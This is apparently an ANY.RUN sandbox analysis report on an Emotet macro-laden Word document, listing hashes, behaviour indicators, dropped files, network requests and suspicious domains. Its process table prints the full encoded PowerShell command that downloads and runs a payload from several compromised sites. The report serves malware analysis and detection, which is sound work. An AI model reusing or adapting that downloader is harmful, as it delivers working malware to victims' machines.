analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

emotet.docx

Full analysis: https://app.any.run/tasks/bca6a016-f8ed-49e9-89a6-d42d2f5a7b9b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 24, 2022, 17:22:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Ut., Author: Maxime Rolland, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Sep 18 23:05:00 2020, Last Saved Time/Date: Fri Sep 18 23:05:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
MD5:

E9AFE010343209A2A0F2EB5EC56CDACC

SHA1:

96425D2E0C0B8A909933BFBD1DCE2A48D0F3AB8B

SHA256:

176F0216B10686D19666AF505DF4F1EFDEF324F146990AA31D9F6A6B30D36826

SSDEEP:

1536:CC+rdi1Ir77zOH98Wj2gpngx+a9WH4oaJrtrYYnalL2VCf3orH8:GrfrzOH98ipgiHEJrtrDnalL2Vw3I8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the computer name

      • powershell.exe (PID: 1508)
    • PowerShell script executed

      • powershell.exe (PID: 1508)
    • Checks supported languages

      • powershell.exe (PID: 1508)
    • Executed via WMI

      • powershell.exe (PID: 1508)
    • Reads Environment values

      • powershell.exe (PID: 1508)
  • INFO

    • Checks supported languages

      • WINWORD.EXE (PID: 1704)
    • Reads mouse settings

      • WINWORD.EXE (PID: 1704)
    • Reads the computer name

      • WINWORD.EXE (PID: 1704)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1704)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 1508)
      • WINWORD.EXE (PID: 1704)
    • Reads settings of System Certificates

      • powershell.exe (PID: 1508)
      • WINWORD.EXE (PID: 1704)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1704)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 23
Paragraphs: 1
Lines: 1
Company: -
Security: None
Characters: 21
Words: 3
Pages: 1
ModifyDate: 2020:09:18 22:05:00
CreateDate: 2020:09:18 22:05:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Maxime Rolland
Subject: -
Title: Ut.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1704"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\emotet.docx.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\gdi32.dll
1508powershell -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwAGUARQBcAEQAYQAzAEkAcABmAHYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBDAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAcgBpAHQAYAB5AGAAcABSAG8AdABPAGAAQwBvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAxADIAJwArACcALAAnACsAJwAgACcAKQArACcAdABsACcAKwAnAHMAJwArACcAMQAxACcAKwAoACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABQADQAZAA1AGIAZABpACAAPQAgACgAKAAnAEEAdgAnACsAJwBiACcAKQArACgAJwBqAGoAeAB4ACcAKwAnAF8AJwApACsAJwBiACcAKQA7ACQATgBsAGQAaQBrAHEAaQA9ACgAJwBFACcAKwAoACcAMgBwACcAKwAnAGoANwAnACsAJwBqAGcAJwApACkAOwAkAEMAZgBfAHkAbAA3AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ASQB4AF8AJwArACgAJwB1ADAAJwArACcAZQBlACcAKQArACcAewAwAH0ARABhADMAaQAnACsAJwBwAGYAJwArACcAdgB7ADAAJwArACcAfQAnACkAIAAtAGYAWwBjAGgAYQByAF0AOQAyACkAKwAkAFAANABkADUAYgBkAGkAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABaAHoAZABkAG4AbgBsAD0AKAAnAEYAJwArACcANQBkACcAKwAoACcAbAAnACsAJwBvAF8AeQAnACkAKQA7ACQAWAA0ADcANABmAHkAMgA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgB3AGUAYgBjAEwAaQBFAE4AdAA7ACQAUQBhADkAdwA1ADgAdwA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAcgBlAHMAZQAnACkAKwAoACcAbABsAGUAcgAtACcAKwAnAGQAZQAnACsAJwBtACcAKQArACcAbwAtACcAKwAnAHcAZQAnACsAJwBiAHMAJwArACcAaQAnACsAJwB0AGUAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAvACcAKwAoACcAZABpACcAKwAnAHMAYwB1AHMAJwApACsAKAAnAHMAJwArACcAaQBvAG4ALwBxAFcAVwBmACcAKwAnADgARgAnACkAKwAoACcAUwAnACsAJwAvACoAJwArACcAaAB0AHQAJwApACsAKAAnAHAAcwAnACsAJwA6AC8ALwB3ACcAKQArACcAdwB3ACcAKwAoACcALgBtACcAKwAnAG8AJwArACcAYwBrAGQAdQBtAHAAcwAuAGMAJwApACsAJwBvAG0AJwArACcALwAnACsAKAAnAHQAJwArACcAZQBzAHQALwAnACsAJwBaADIAcABKAC8AKgAnACsAJwBoACcAKQArACcAdAB0ACcAKwAoACcAcABzADoAJwArACcALwAnACkAKwAoACcALwB0ACcAKwAnAHcAaQAnACkAKwAoACcAcwAnACsAJwB0AGUAJwApACsAKAAnAHIAcAAnACsAJwByAGkAJwApACsAKAAnAG4AdAAnACsAJwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGMAaAByAG8AJwApACsAKAAnAG0AZQAnACsAJwB0AGgAZQAnACkAKwAoACcAbQBlAC8AVgAnACsAJwBjAHIAJwArACcALwAqACcAKQArACgAJwBoACcAKwAnAHQAdAAnACkAKwAoACcAcAA6AC8ALwAnACsAJwBzACcAKQArACcAaQBtACcAKwAoACcAdQAnACsAJwBsAGEAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAG8AcgAnACsAJwBnACcAKQArACcALwAnACsAKAAnAHIAdwBfAGMAJwArACcAbwBtACcAKQArACgAJwBtAG8AJwArACcAbgAvACcAKwAnAEsAZgAnACkAKwAnAFgAMgAnACsAKAAnAE0AVwAvACoAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwBwACcAKwAnAGwAYQAnACkAKwAnAG4AJwArACcAbwAnACsAKAAnAHMAJwArACcAZABlAHMAJwArACcAYQB1AGQAZQBzAGUAJwArACcAbQBjACcAKQArACcAYQAnACsAJwByAGUAJwArACcAbgBjACcAKwAnAGkAYQAnACsAJwAuACcAKwAnAGMAbwAnACsAKAAnAG0ALwAnACsAJwBlAHIAcgBvAHMALwAnACkAKwAnAEoAJwArACgAJwBIAG8AJwArACcAcQAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwB2AGkAYQBqAGUAJwArACcALQBhACcAKQArACgAJwBjACcAKwAnAGgAaQBuAGEALgAnACkAKwAnAGMAJwArACcAbwBtACcAKwAoACcALwB3AHAAJwArACcALQAnACkAKwAoACcAYQBkACcAKwAnAG0AaQAnACsAJwBuAC8AQQAxAE8AOAB0ACcAKQArACcATAAnACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcABzACcAKwAnADoALwAnACkAKwAoACcALwBjAGUAJwArACcAYQByACcAKQArACgAJwBhAGMAdQBsACcAKwAnAHQAdQByAGEAJwArACcAbAAnACsAJwAuACcAKwAnAGMAbwBtAC4AYgAnACkAKwAoACcAcgAvACcAKwAnAHQAJwApACsAJwB1ACcAKwAoACcAcgAnACsAJwBpAHMAJwArACcAbQBvAC8AbwB5AC8AJwApACkALgAiAFMAcABMAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWQA2AHQAZwB6AGwAXwA9ACgAJwBVAG4AJwArACgAJwB3ADAAbQAzACcAKwAnADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABXAGsAZQBuADgAaQBnACAAaQBuACAAJABRAGEAOQB3ADUAOAB3ACkAewB0AHIAeQB7ACQAWAA0ADcANABmAHkAMgAuACIAZABgAG8AdwBuAEwAbwBhAGQAZgBpAGAATABlACIAKAAkAFcAawBlAG4AOABpAGcALAAgACQAQwBmAF8AeQBsADcAcgApADsAJABDAGMAeAAwADgAMAByAD0AKAAoACcAQQBkACcAKwAnAGIAcQBtADgAJwApACsAJwBiACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABDAGYAXwB5AGwANwByACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgAzADgAMAAwACkAIAB7ACYAKAAnAEkAbgAnACsAJwB2AG8AawBlACcAKwAnAC0ASQB0AGUAbQAnACkAKAAkAEMAZgBfAHkAbAA3AHIAKQA7ACQAVABsAGEAMQBfAHMAegA9ACgAKAAnAE4AJwArACcAawBfADMAbQAnACkAKwAnAHkAcAAnACkAOwBiAHIAZQBhAGsAOwAkAEkAaABtAG4AMQA0AF8APQAoACcASgAnACsAJwBmACcAKwAoACcAdwBrACcAKwAnAHUAagA4ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADcAdwBxAHoAYwBkAD0AKAAnAFkAJwArACgAJwBqAG8AeQByAG8AJwArACcAeQAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
34 640
Read events
24 532
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
10
Text files
2
Unknown types
6

Dropped files

PID
Process
Filename
Type
1704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE821.tmp.cvr
MD5:
SHA256:
1508powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:D3C284009A5790C3AA90D7C5D620CA65
SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39
1704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$otet.docx.docpgc
MD5:63C466921444861581923CF41403B6C0
SHA256:35A9F1A62F7EAE9B98B94D0B51607A867D086FBDD32C717FACD6E0E2E9B88B7F
1704WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:47833F06A09092E5A93993ACA108BA6B
SHA256:65858CC9EB1EE8535DFA4EE645E7FCC26C4E0D2832C2544A0A08E09918DD61E5
1508powershell.exeC:\Users\admin\AppData\Local\Temp\Tar1E74.tmpcat
MD5:D99661D0893A52A0700B8AE68457351A
SHA256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
1704WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:6B41399839B0C939C969A4153F70A409
SHA256:22EE76EE5124CE3656BC5EDBD1DB9E01F2114BD89F0600DF07D8AEFA1C34DE4E
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.sigbinary
MD5:21C9DEC0A2669B08574EDE876F1BC70A
SHA256:B5AC1583F2A9B18BDAC4B9EC98C33FF06F74972FDB2056F7CE88B1C7987A761D
1704WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.xmlxml
MD5:FFB21B813F6F55C9B9CD78ED58EC8645
SHA256:98971524174CFF5677537E8810110EEAAFB83FD8EB8F922A48E3B216ABAC40E5
1704WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442der
MD5:A5076A60FF4D331B4609DE91B658E675
SHA256:B1F5B421AD5B4A133ED6F8BDCA9767B9D7A11FC97EED75C9945AF28F5DE030BA
1508powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:6E912AD5D6CA6A3B950247E396EE5EE1
SHA256:31294F80FDCD87C550092ED86CF8204EDA54A301033094E2B75F8C99D720BF0D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
16
DNS requests
12
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1704
WINWORD.EXE
GET
200
52.109.76.68:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023
IE
xml
1.96 Kb
whitelisted
1508
powershell.exe
GET
404
103.91.64.211:80
http://reseller-demo-website.com/discussion/qWWf8FS/
MY
html
24.4 Kb
suspicious
1704
WINWORD.EXE
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA%2BnRyLFPYjID1ie%2Bx%2BdSjo%3D
US
der
1.47 Kb
whitelisted
1508
powershell.exe
GET
404
187.1.136.118:80
http://planosdesaudesemcarencia.com/erros/JHoq/
BR
html
315 b
suspicious
1508
powershell.exe
GET
200
209.197.3.8:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1d64981d65c31ec9
US
compressed
59.9 Kb
whitelisted
1508
powershell.exe
GET
404
52.20.84.62:80
http://simulations.org/rw_common/KfX2MW/
US
html
150 b
malicious
1704
WINWORD.EXE
GET
200
209.197.3.8:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?8f9eccee66d29ad2
US
compressed
4.70 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1508
powershell.exe
209.197.3.8:80
ctldl.windowsupdate.com
Highwinds Network Group, Inc.
US
whitelisted
1704
WINWORD.EXE
52.109.76.68:80
office14client.microsoft.com
Microsoft Corporation
IE
suspicious
1508
powershell.exe
52.36.0.158:443
twisterprint.com
Amazon.com, Inc.
US
suspicious
1508
powershell.exe
104.21.72.194:443
www.mockdumps.com
Cloudflare Inc
US
unknown
1508
powershell.exe
103.91.64.211:80
reseller-demo-website.com
Gigabit Hosting Sdn Bhd
MY
suspicious
1704
WINWORD.EXE
52.109.8.27:443
rr.office.microsoft.com
Microsoft Corporation
US
whitelisted
1704
WINWORD.EXE
209.197.3.8:80
ctldl.windowsupdate.com
Highwinds Network Group, Inc.
US
whitelisted
1508
powershell.exe
187.1.136.118:80
planosdesaudesemcarencia.com
IPV6 Internet Ltda
BR
unknown
1704
WINWORD.EXE
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1508
powershell.exe
52.20.84.62:80
simulations.org
Amazon.com, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
reseller-demo-website.com
  • 103.91.64.211
suspicious
www.mockdumps.com
  • 104.21.72.194
  • 172.67.154.140
suspicious
twisterprint.com
  • 52.36.0.158
suspicious
ctldl.windowsupdate.com
  • 209.197.3.8
whitelisted
office14client.microsoft.com
  • 52.109.76.68
whitelisted
simulations.org
  • 52.20.84.62
malicious
planosdesaudesemcarencia.com
  • 187.1.136.118
suspicious
viaje-achina.com
  • 47.89.209.212
suspicious
rr.office.microsoft.com
  • 52.109.8.27
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

No threats detected
No debug info